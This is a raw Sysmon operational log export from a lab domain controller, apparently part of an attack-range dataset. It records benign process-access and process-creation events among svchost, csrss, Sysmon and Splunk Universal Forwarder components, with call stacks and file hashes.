13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:46.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-939E-6005-D904-00000000A301}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.027{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-939E-6005-D904-00000000A301}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:46.029{59A5CD1D-939E-6005-D904-00000000A301}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.152{59A5CD1D-939F-6005-DA04-00000000A301}36882632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-939F-6005-DA04-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-939F-6005-DA04-00000000A301}3688C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.027{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-939F-6005-DA04-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:47.028{59A5CD1D-939F-6005-DA04-00000000A301}3688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.839{59A5CD1D-93A0-6005-DC04-00000000A301}31043264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:48.699{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93A0-6005-DC04-00000000A301}3104C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:56:48.699{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 